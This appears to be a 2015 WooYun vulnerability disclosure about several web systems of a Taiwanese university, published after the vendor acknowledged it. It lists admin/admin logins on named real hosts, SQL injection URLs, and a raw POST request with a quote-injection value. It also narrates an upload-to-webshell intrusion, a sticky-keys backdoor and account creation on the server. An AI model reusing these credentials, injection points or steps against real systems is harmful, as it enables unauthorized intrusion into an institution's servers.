当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-097994

漏洞标题:台湾某大学问题打包#1

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: scanf

提交时间:2015-02-27 15:50

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-27: 细节已通知厂商并且等待厂商处理中
2015-03-03: 厂商已经确认,细节仅向厂商公开
2015-03-13: 细节向核心白帽子及相关领域专家公开
2015-03-23: 细节向普通白帽子公开
2015-04-02: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

./.

详细说明:

是台湾的國立高雄應用科技大學
http://www.kuas.edu.tw/bin/home.php
先是弱口令
http://www2.ce.kuas.edu.tw/manage/
admin/admin

QQ截图20150222180704.jpg


http://www.acce.kuas.edu.tw/admin/app/cert.asp
admin /admin

QQ截图20150222181329.jpg


http://3q.kuas.edu.tw/login.php
admin /admin

QQ截图20150222182630.jpg


目录遍历:http://www.che.kuas.edu.tw/admin/
注入:
http://www.lib.kuas.edu.tw/news_full.asp?nid=1684

QQ截图20150222182530.jpg


POST注入.

POST /EPortfolio/Activity/UnitBsCalendar.aspx HTTP/1.1
Host: active.kuas.edu.tw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://active.kuas.edu.tw/EPortfolio/Activity/UnitBsCalendar.aspx
Cookie: ASP.NET_SessionId=trwd4nyno3weysjilyythtlh
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16830
ContentPlaceHolder1_ToolkitScriptManager1_HiddenField=%3B%3BAjaxControlToolkit%2C+Version%3D4.1.60919.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D28f01b0e84b6d53e%3Azh-TW%3Aee051b62-9cd6-49a5-87bb-93c07bc43d63%3Ade1feab2%3Af9cec9bc%3Aa0b0f951%3Aa67c2700%3Afcf0e993%3Af2c8e708%3A720a52bf%3A589eaa30%3A698129cf%3Afb9b4c57%3Accb96cf9&__LASTFOCUS=&ContentPlaceHolder1_TabContainer1_ClientState=%7B%22ActiveTabIndex%22%3A4%2C%22TabEnabledState%22%3A%5Btrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%5D%2C%22TabWasLoadedOnceState%22%3A%5Bfalse%2Cfalse%2Cfalse%2Cfalse%2Ctrue%5D%7D&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTI1OTYxMzEwMA8WAh4XRGVmYXVsdFNjaFllYXJTZW1TdHJpbmcFBTEwMy0xFgJmD2QWAgIED2QWAgIBD2QWBgIBD2QWAgIBD2QWAgIBD2QWAgIHDw8WAh4ETW9kZQsqJVN5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuVGV4dEJveE1vZGUAZGQCAw9kFgICAQ88KwANAQwUKwACBQcyOjAsMDowFCsAAhYEHgRUZXh0BQ%2Fmpa3li5nooYzkuovmm4YeBVZhbHVlBQ%2Fmpa3li5nooYzkuovmm4ZkFgJmD2QWAmYPFQEP5qWt5YuZ6KGM5LqL5puGZAIFD2QWAgIBD2QWAgIBD2QWAgIDDw8WBB4IVGFiSW5kZXgBAAAeEkxhc3RBY3RpdmVUYWJJbmRleAIEZBYCAgQPZBYCZg9kFgICAQ9kFhACAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBRBTY2hZZWFyU2VtU3RyaW5nHg5EYXRhVmFsdWVGaWVsZAUPU2NoWWVhclNlbVZhbHVlHgtfIURhdGFCb3VuZGdkEBUCBzEwMyDkuIsHMTAzIOS4ihUCBTEwMy0yBTEwMy0xFCsDAmdnZGQCBQ8QZGQWAWZkAgcPEGRkFgBkAhEPZBYCAgUPZBYEAgEPEGRkFgECCGQCAw8QZGQWAWZkAhMPZBYCAgUPZBYEAgEPEGRkFgECCGQCAw8QZGQWAWZkAhUPDxYCHwIFEualreWLmea0u%2BWLleafpeipomRkAhcPZBYIAgEPDxYCHgdFbmFibGVkaGRkAgUPDxYCHwloZGQCEQ8PFgIfAgUT56ysMemggSAvIOWFsTE1N%2BmggWRkAhMPZBYCAgcPDxYCHwIFAzE1N2RkAhkPPCsAEQIADxYEHwhnHgtfIUl0ZW1Db3VudAIKZAEQFgAWABYAFgJmD2QWFgIBD2QWDGYPZBYCAgEPDxYCHwIFBTEwMy0xZGQCAQ8PFgIfAgU0MTAz5bm05bqm56ysM%2BWto%2Bapn%2BmXnOe2oOiJsuaOoeizvOe4vuaViOipleaguOS9nOalrWRkAgIPZBYCAgEPDxYCHwIFFTIwMTMvOC8xIH4gMjAxNC8xMC8yNWRkAgMPZBYCAgEPDxYCHwIFCee4veWLmeiZlWRkAgQPDxYCHwIFCDIwMTQvOS85ZGQCBQ9kFgICAQ8PFgIeD0NvbW1hbmRBcmd1bWVudAUDNDUyZGQCAg9kFgxmD2QWAgIBDw8WAh8CBQUxMDMtMWRkAgEPDxYCHwIFKuacg%2BioiOa6luWJh%2BiIh%2Bacg%2BioiOaVmeiCsuaVmeWtuOW3peS9nOWdimRkAgIPZBYCAgEPDxYCHwIFFTIwMTQvNi8xMSB%2BIDIwMTQvNi8xMWRkAgMPZBYCAgEPDxYCHwIFCeacg%2BioiOezu2RkAgQPDxYCHwIFCTIwMTQvOS8xM2RkAgUPZBYCAgEPDxYCHwsFBDE1OThkZAIDD2QWDGYPZBYCAgEPDxYCHwIFBTEwMy0xZGQCAQ8PFgIfAgUe5ZWG5qWt54%2B%2B5Luj5YyW5a246KGT56CU6KiO5pyDZGQCAg9kFgICAQ8PFgIfAgUVMjAxNC82LzIwIH4gMjAxNC82LzIwZGQCAw9kFgICAQ8PFgIfAgUJ5pyD6KiI57O7ZGQCBA8PFgIfAgUJMjAxNC85LzEzZGQCBQ9kFgICAQ8PFgIfCwUEMTYwMWRkAgQPZBYMZg9kFgICAQ8PFgIfAgUFMTAzLTFkZAIBDw8WAh8CBT%2FmlLblj5cgMTAz5bm05YWo5qCh5ZCE57O75omA55Wi5qWt5Y2a56Kp5aOr6KuW5paH5pu455uu5bu65qqUICBkZAICD2QWAgIBDw8WAh8CBRQyMDE0LzcvMSB%2BIDIwMTUvMi8xN2RkAgMPZBYCAgEPDxYCHwIFCeWcluabuOmkqGRkAgQPDxYCHwIFCDIwMTQvOS8zZGQCBQ9kFgICAQ8PFgIfCwUDMTk1ZGQCBQ9kFgxmD2QWAgIBDw8WAh8CBQUxMDMtMWRkAgEPDxYCHwIFTeezu%2BaJgOaWsOizvOWcluabuOWujOaIkOabuOebruaqlOafpeaguOWPiuS4iuaetuaZgiwg55m85Ye657O75omA5paw5pu46YCa5aCxZGQCAg9kFgICAQ8PFgIfAgUUMjAxNC83LzEgfiAyMDE0LzkvMzBkZAIDD2QWAgIBDw8WAh8CBQnlnJbmm7jppKhkZAIEDw8WAh8CBQgyMDE0LzkvM2RkAgUPZBYCAgEPDxYCHwsFAzE5N2RkAgYPZBYMZg9kFgICAQ8PFgIfAgUFMTAzLTFkZAIBDw8WAh8CBT%2FntrLpoIEmbHQ75ZyW5pu45ZyS5ZywJmd0O%2BWFrOWRiuabtOaWsOezu%2BaJgOaOoeizvOaWsOabuOmAmuWgsSBkZAICD2QWAgIBDw8WAh8CBRQyMDE0LzcvMSB%2BIDIwMTQvOS8zMGRkAgMPZBYCAgEPDxYCHwIFCeWcluabuOmkqGRkAgQPDxYCHwIFCDIwMTQvOS8zZGQCBQ9kFgICAQ8PFgIfCwUDMjA0ZGQCBw9kFgxmD2QWAgIBDw8WAh8CBQUxMDMtMWRkAgEPDxYCHwIFGzEwM%2BW5tOW6puaakeacn%2BagoeWkluWvpue%2FkmRkAgIPZBYCAgEPDxYCHwIFFDIwMTQvNy83IH4gMjAxNC84LzI5ZGQCAw9kFgICAQ8PFgIfAgUJ5Lq66LOH57O7ZGQCBA8PFgIfAgUJMjAxNC85LzE4ZGQCBQ9kFgICAQ8PFgIfCwUEMTg4MWRkAggPZBYMZg9kFgICAQ8PFgIfAgUFMTAzLTFkZAIBDw8WAh8CBR7nrKzkuozlsYbmmpHmnJ%2Fpm7vohabmlZnogrLnh59kZAICD2QWAgIBDw8WAh8CBRQyMDE0LzcvNyB%2BIDIwMTQvNy8xMGRkAgMPZBYCAgEPDxYCHwIFCeizh%2BW3peezu2RkAgQPDxYCHwIFCjIwMTQvMTEvMjZkZAIFD2QWAgIBDw8WAh8LBQQyMzAwZGQCCQ9kFgxmD2QWAgIBDw8WAh8CBQUxMDMtMWRkAgEPDxYCHwIFKOaVmeiCsumDqOijnOWKqeaVmeW4q%2Bi1tOWFrOawkeeHn%2BeglOe%2Fki1kZAICD2QWAgIBDw8WAh8CBRQyMDE0LzcvOSB%2BIDIwMTQvNy8xMWRkAgMPZBYCAgEPDxYCHwIFCeacg%2BioiOezu2RkAgQPDxYCHwIFCTIwMTQvOS8xM2RkAgUPZBYCAgEPDxYCHwsFBDE2MDhkZAIKD2QWDGYPZBYCAgEPDxYCHwIFBTEwMy0xZGQCAQ8PFgIfAgUY5aCx5bui6LKh54mp5Zue5pS26K6K6LOjZGQCAg9kFgICAQ8PFgIfAgUTMjAxNC83LzkgfiAyMDE0LzcvOWRkAgMPZBYCAgEPDxYCHwIFCee4veWLmeiZlWRkAgQPDxYCHwIFCTIwMTQvOS8xNWRkAgUPZBYCAgEPDxYCHwsFBDE2NjZkZAILDw8WAh4HVmlzaWJsZWhkZBgDBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUnY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRUYWJDb250YWluZXIxBSdjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJFRhYkNvbnRhaW5lcjEPD2QCBGQFTGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkVGFiQ29udGFpbmVyMSRUYWJQYW5lbEJzU2VhcmNoJGd2Rm9yQnNBY3RpdmVTZWFyY2gPPCsADAEIAgFk%2Bl1%2FMCUdzDTQjVyuN6a4wgRwCiTDVtJS8DoPXzEBvTM%3D&__EVENTVALIDATION=%2FwEWdwLxvtihAgLC3ffwDwKV3aulDgLV1ZWeAQLlmaPRCQLRovlJAueA6J4LAtqnpbUMApW90PwFAuKa6aQNAoWPzooGAqzGkOoMAreinuYKAtSP93EC0pDX%2FQEC%2FPelkwUC%2F%2FelkwUC9czo6g0ChJvWOwKOnbn6BALd9PzVDALm9IzLDAKV0ZqFCQLswvqaBgKNu8fRDwKH9%2Bz4CALpvue2BwLE4euUCQKVtruvDQLLqpOBCgLCwbr1CALBser0DgKul5v9DwLklKF4AqymyrAHAqiFgYgNAq%2BsvfEGAuWRjfICAsqqj%2BYDAsXBvtgCAsSx7tcIAvuWp8ECApeVlb4DAtvPvrAJAv347JUBAtituVIC5pGR0woCzqrbogQCycGCkwMCyLGykgkC%2BJfjzAECkpaJyAICtqbysA8C1IXZBgKsrKWnAQLqkbX5BwLLqtcLAsLBhoIPAsGxtoEFArKX75wJAriW3ZkKAp%2Bm5rwGAryF5ZAHAq%2BsoZQNAuaRueIDAsuq4%2BgGAsLBit0FAsGxmtwLAuCX69gGAs6W8csHApKm%2BrwEAoqF0ZIEAq%2Bs7fADAueRvb8KAsyq38kOAsPBjrwNAsKxnrsDApaY95gGAtyU5Y0HAoOn7rgDApqF%2FZQFAq6s6c0LAueRwaACAtCqq6cPAsfB0vgNAsax4vcDAouVs%2BQFAtuVmd8GAv%2BnongCoISp5w0CsqzVgwwC3JGl9QYCzqqnkAsCycHW3wkCyLHm3g8CzZb%2FsgsCwZatoQwCyaaWhAgCx4W18QICrKzR8AcC6JGp3gICyZXBvwUCrqvwjgQCrZvAjgoC%2BYfLxgECkYWJuwICsYeqtQkCkbL4ggoCk5SjjAICiZj27AgCxpW9qAECq6vk%2FQ8CqpvU%2FQUCw4HHkgkCw4z9jAoC34auRQL4soSFDwKOlO%2F4DQKFmPrVBP8MuigEDm%2BixkXuOMcKJO%2BF4eIqnieao%2BDkG19rOfQj&ctl00%24LoginFormBox1%24TbLoginId=00&ctl00%24LoginFormBox1%24TbLoginPW=00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24DDLForSchYearSem=103-1&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24TextBoxForKeyword=0000'&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24DDLForGovOrTeach=%E9%81%B8%E6%93%87%E9%83%A8%E9%96%80&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24BtnForSearch=%E6%9F%A5%E8%A9%A2&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24DateTimeBoxForStart%24DateFieldBox=2015%2F2%2F22&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24DateTimeBoxForEnd%24DateFieldBox=2015%2F2%2F22&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl02%24HFForBs_No=452&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl02%24HFForSchYear=103&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl02%24HFForSchSem=1&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl02%24HFForActStartTime=2013%2F8%2F1+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl02%24HFForActEndTime=2014%2F10%2F25+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl02%24HFForUnt_Name_Abr=%E4%BA%8B%E5%8B%99%E7%B5%84&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl02%24HFForupUnitName=%E7%B8%BD%E5%8B%99%E8%99%95&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl02%24HFForUnt_Type=G&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl03%24HFForBs_No=1598&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl03%24HFForSchYear=103&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl03%24HFForSchSem=1&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl03%24HFForActStartTime=2014%2F6%2F11+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl03%24HFForActEndTime=2014%2F6%2F11+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl03%24HFForUnt_Name_Abr=%E6%9C%83%E8%A8%88%E7%B3%BB&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl03%24HFForupUnitName=%E7%AE%A1%E7%90%86%E5%AD%B8%E9%99%A2&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl03%24HFForUnt_Type=T&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl04%24HFForBs_No=1601&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl04%24HFForSchYear=103&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl04%24HFForSchSem=1&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl04%24HFForActStartTime=2014%2F6%2F20+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl04%24HFForActEndTime=2014%2F6%2F20+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl04%24HFForUnt_Name_Abr=%E6%9C%83%E8%A8%88%E7%B3%BB&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl04%24HFForupUnitName=%E7%AE%A1%E7%90%86%E5%AD%B8%E9%99%A2&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl04%24HFForUnt_Type=T&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl05%24HFForBs_No=195&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl05%24HFForSchYear=103&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl05%24HFForSchSem=1&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl05%24HFForActStartTime=2014%2F7%2F1+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl05%24HFForActEndTime=2015%2F2%2F17+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl05%24HFForUnt_Name_Abr=%E5%9C%96%E6%9B%B8%E9%A4%A8%E6%8A%80%E8%A1%93%E7%B5%84&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl05%24HFForupUnitName=%E5%9C%96%E6%9B%B8%E9%A4%A8&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl05%24HFForUnt_Type=G&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl06%24HFForBs_No=197&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl06%24HFForSchYear=103&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl06%24HFForSchSem=1&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl06%24HFForActStartTime=2014%2F7%2F1+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl06%24HFForActEndTime=2014%2F9%2F30+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl06%24HFForUnt_Name_Abr=%E5%9C%96%E6%9B%B8%E9%A4%A8%E6%8A%80%E8%A1%93%E7%B5%84&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl06%24HFForupUnitName=%E5%9C%96%E6%9B%B8%E9%A4%A8&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl06%24HFForUnt_Type=G&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl07%24HFForBs_No=204&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl07%24HFForSchYear=103&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl07%24HFForSchSem=1&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl07%24HFForActStartTime=2014%2F7%2F1+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl07%24HFForActEndTime=2014%2F9%2F30+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl07%24HFForUnt_Name_Abr=%E5%9C%96%E6%9B%B8%E9%A4%A8%E6%8A%80%E8%A1%93%E7%B5%84&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl07%24HFForupUnitName=%E5%9C%96%E6%9B%B8%E9%A4%A8&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl07%24HFForUnt_Type=G&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl08%24HFForBs_No=1881&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl08%24HFForSchYear=103&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl08%24HFForSchSem=1&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl08%24HFForActStartTime=2014%2F7%2F7+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl08%24HFForActEndTime=2014%2F8%2F29+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl08%24HFForUnt_Name_Abr=%E4%BA%BA%E8%B3%87%E7%B3%BB&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl08%24HFForupUnitName=%E4%BA%BA%E6%96%87%E7%A4%BE%E6%9C%83%E5%AD%B8%E9%99%A2&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl08%24HFForUnt_Type=T&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl09%24HFForBs_No=2300&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl09%24HFForSchYear=103&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl09%24HFForSchSem=1&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl09%24HFForActStartTime=2014%2F7%2F7+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl09%24HFForActEndTime=2014%2F7%2F10+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl09%24HFForUnt_Name_Abr=%E8%B3%87%E5%B7%A5%E7%B3%BB&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl09%24HFForupUnitName=%E9%9B%BB%E8%B3%87%E5%AD%B8%E9%99%A2&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl09%24HFForUnt_Type=T&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl10%24HFForBs_No=1608&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl10%24HFForSchYear=103&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl10%24HFForSchSem=1&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl10%24HFForActStartTime=2014%2F7%2F9+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl10%24HFForActEndTime=2014%2F7%2F11+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl10%24HFForUnt_Name_Abr=%E6%9C%83%E8%A8%88%E7%B3%BB&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl10%24HFForupUnitName=%E7%AE%A1%E7%90%86%E5%AD%B8%E9%99%A2&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl10%24HFForUnt_Type=T&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl11%24HFForBs_No=1666&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl11%24HFForSchYear=103&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl11%24HFForSchSem=1&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl11%24HFForActStartTime=2014%2F7%2F9+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl11%24HFForActEndTime=2014%2F7%2F9+%E4%B8%8A%E5%8D%88+12%3A00%3A00&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl11%24HFForUnt_Name_Abr=%E4%BF%9D%E7%AE%A1%E7%B5%84&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl11%24HFForupUnitName=%E7%B8%BD%E5%8B%99%E8%99%95&ctl00%24ContentPlaceHolder1%24TabContainer1%24TabPanelBsSearch%24gvForBsActiveSearch%24ctl11%24HFForUnt_Type=G


QQ截图20150222184811.jpg


QQ截图20150222184758.jpg


网络问题就不跑库了,但是一定能出数据的.
还有ASP.NET Padding Oracle Vulnerability
http://tles.kuas.edu.tw/

QQ截图20150222185222.jpg


没办法网络问题跑了一下午了.

漏洞证明:

突破口:http://www.acce.kuas.edu.tw/

QQ截图20150222183446.jpg


任意上传.

QQ截图20150222183633.jpg


然后就得到shell

QQ截图20150222183832.jpg


然后转发.
发现粘贴键后门.

QQ截图20150222183950.jpg


下回本地破解了.
密码为jsjs
日期好早.

QQ截图20150222184139.jpg


然后建账号进服务器
嗯,还是挺大的网络

QQ截图20150222184247.jpg


由于是宝岛的大学就不深入了.

修复方案:

运维都知道.

版权声明:转载请注明来源 scanf@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-03 00:04

厂商回复:

感謝通報

最新状态:

暂无